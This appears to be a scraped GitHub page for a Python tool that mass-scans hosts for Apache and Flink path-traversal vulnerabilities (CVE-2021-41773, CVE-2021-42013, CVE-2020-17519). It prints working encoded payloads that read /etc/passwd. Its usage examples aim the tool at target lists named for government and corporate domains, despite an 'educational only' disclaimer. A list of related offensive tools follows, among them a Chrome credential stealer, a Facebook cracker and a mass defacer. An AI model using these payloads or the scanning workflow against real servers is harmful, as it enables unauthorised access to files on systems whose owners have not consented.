It's a simple tool for test vulnerability Apache Path Traversal

Related tags

Security related resourcescve-2020-17519cve-2021-41773cve-2021-42013
Overview

SimplesApachePathTraversal

Banner Simples Apache Path Traversal

Simples Apache Path Traversal

It's a simple tool for test vulnerability Apache Path Traversal
https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html

GPL License GitHub code size in bytes Python 3.8 Supported_OS Linux orange Supported OS Mac 

Autor:    MrCl0wn
Blog:     https://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Gr33ts:
+ aCCESS Security Lab @exchangesec
   - Megarushing, Ofjaaaah, 5Ub5010, Gh05tPT, Hunt3rPl4nk

Path traversal (software bug)

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. 
The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any 
damages caused by direct or indirect use of the information or functionality provided by these 
programs. The author or any Internet provider bears NO responsibility for content or misuse 
of these programs or any derivatives thereof. By using these programs you accept the fact 
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these 
programs is not MrCl0wnLab's responsibility.

This script checks for vulnerabilities

Commands

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

Screenshots

Screenshot Screenshot

Flow to generate targets

Screenshot

Help

python main.py --help
 
                                   .,,
                                  (=\/\
                                   \=\/\
                                    \=\/\
                                     `=\/
                                        \                                                                                                                  
           simples [ APACHE ]
           ___      _   _       _____                                    _ 
          / _ \__ _| |_| |__   /__   \_ __ __ ___   _____ _ __ ___  __ _| |
         / /_)/ _` | __| '_ \    / /\/ '__/ _` \ \ / / _ \ '__/ __|/ _` | |
        / ___/ (_| | |_| | | |  / /  | | | (_| |\ V /  __/ |  \__ \ (_| | |
        \/    \__,_|\__|_| |_|  \/   |_|  \__,_| \_/ \___|_|  |___/\__,_|_|
                                                                   
              
                      By: MrCl0wn / https://blog.mrcl0wn.com
                                    https://twitter.com/MrCl0wnLab 
                                    https://github.com/MrCl0wnLab                                                                         
         
usage: tool [-h] [--file 
   
    ] [--range 
    
     ,
     
      ]
     
    
   
            [--thread <20>] [--ssl] [--timeout <5>] [--debug]

[!] Check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
[!] File exploits: /assets/exploits.json
[!] Output: output/vuln.txt

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

optional arguments:
  -h, --help            show this help message and exit
  --file 
   
          Input your target host lists
   
  --range 
   
    ,
    
   
                        Set range IP Eg.: 192.168.15.1,192.168.15.100
  --thread <20>, -t <20>
                        Eg. 20
  --ssl                 Enable request with SSL
  --timeout <5>         Set connection timeout
  --debug, -d           Enable debug mode

Tree

.
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print01.png
│       └── print02.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_mrclw.py
│   ├── color_mrclw.py
│   ├── debug_mrclw.py
│   ├── file_mrclw.py
│   ├── __init__.py
│   ├── request_mrclw.py
│   ├── shodan_mrclw.py
│   └── thread_mrclw.py
├── output
└── README.md

File exploit

assets/exploits.json

{
    "CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "CVE-2021-42013-1": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-3": "/cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-4":"/cgi-bin/%25%25%25%2e/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2020-17519-0":"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
    "CVE-2020-17519-1":"/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}

Ref.

Owner
Mr. Cl0wn - H4ck1ng C0d3r
GED (Gambiarra, Exploit and Development ) / Member of Osint Brazuca Project
Mr. Cl0wn - H4ck1ng C0d3r
GitHub Repository https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

Finn Lancaster 3 Oct 05, 2022
CVE-log4j CheckMK plugin

CVE-2021-44228-log4j discovery (Download the MKP package) This plugin discovers vulnerable files for the CVE-2021-44228-log4j issue. To discover this

4 Jan 08, 2022
Fast Fb Cracking Tool

fb-brute Fast Fb Cracking Tool 🏆

Aryan 8 Jun 29, 2022
ClusterFuzz is a scalable fuzzing infrastructure that finds security and stability issues in software.

ClusterFuzz ClusterFuzz is a scalable fuzzing infrastructure that finds security and stability issues in software. Google uses ClusterFuzz to fuzz all

Google 4.9k Jan 08, 2023
CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

antx 365 Nov 30, 2022
The backend part of the simple password manager project made for the creative challenge.

SimplePasswordManagerBackend The backend part of the simple password manager project. Your task will be to showcase your creativity on our channel by

The Coding Jungle 5 Dec 28, 2021
NS-Defacer: a auto html injecter, In other words It's a auto defacer to deface a lot of websites in less time

Overview NS-Defacer is a auto html injecter, In other words It's a auto defacer

NightSec 10 Nov 19, 2022
Lite - Lite cracker tool for python

Wellcome to tools Results Install Tools

Jeeck X Nano 23 Dec 17, 2022
对naabu的端口扫描结果,调用nmap进行指纹识别

naabu2nmap 对naabu的端口扫描结果,调用nmap进行指纹识别

Se7en 12 Nov 22, 2022
MassStringer, CTF Flag Finder

massStringer MassStringer, CTF Flag Finder Usage: python3 massStringer.py Enter absolute path of the directory to scan for flags Edit "flag = re.searc

SuperTsumu 4 Sep 06, 2022
Agile Threat Modeling Toolkit

Threagile is an open-source toolkit for agile threat modeling:

Threagile 425 Jan 07, 2023
OpenTOTP is yet another time-based, one-time passwords (OTPs) generator/verifier inspired by RFC 6238.

OpenTOTP is yet another time-based, one-time passwords (OTPs) generator/verifier inspired by RFC 6238. It generates and validates OTPs based

1 Nov 15, 2021
CTF framework and exploit development library

pwntools - CTF toolkit Pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and develo

Gallopsled 9.8k Dec 31, 2022
Burp Suite extension for encoding/decoding EVM calldata

unblocker Burp Suite extension for encoding/decoding EVM calldata 0x00_prerequisites Burp Suite Java 8+ Python 2.7 0x01_installation clone this reposi

Halborn 16 Aug 30, 2022
The Decompressoin tool for Vxworks MINIFS

MINIFS-Decompression The Decompression tool for Vxworks MINIFS filesystem. USAGE python minifs_decompression.py [target_firmware] The example of Mercu

8 Jan 03, 2023
This is a Crypto asset tracker that I built to aid my personal journey in cryptocurrencies.

Wallet Tracker This is a Crypto asset tracker that I built to aid my personal journey in cryptocurrencies. build docker build -t wallet-tracker . run

2 Mar 21, 2022
AutoScan 有多个目标时,调用xray+rad进行自动扫描

Usage: 在高级版Xray和rad同目录下运行 python3 X-AutoXray.py xxxx.txt 写的蛮人性化的哦,os,linux,windows通用 生成的xray报告会在当前目录的/result下面 Ctrl+c 打断脚本运行时还可以结算扫描进度,生成已扫描和未扫描的进度文件,

斯文 73 Jan 01, 2023
🎻 Modularized exploit generation framework

Modularized exploit generation framework for x86_64 binaries Overview This project is still at early stage of development, so you might want to come b

ᴀᴇꜱᴏᴘʜᴏʀ 30 Jan 17, 2022
Moodle community-based vulnerability scanner

badmoodle Moodle community-based vulnerability scanner Description badmoodle is an unofficial community-based vulnerability scanner for moodle that sc

Michele Di Bonaventura 11 Dec 22, 2022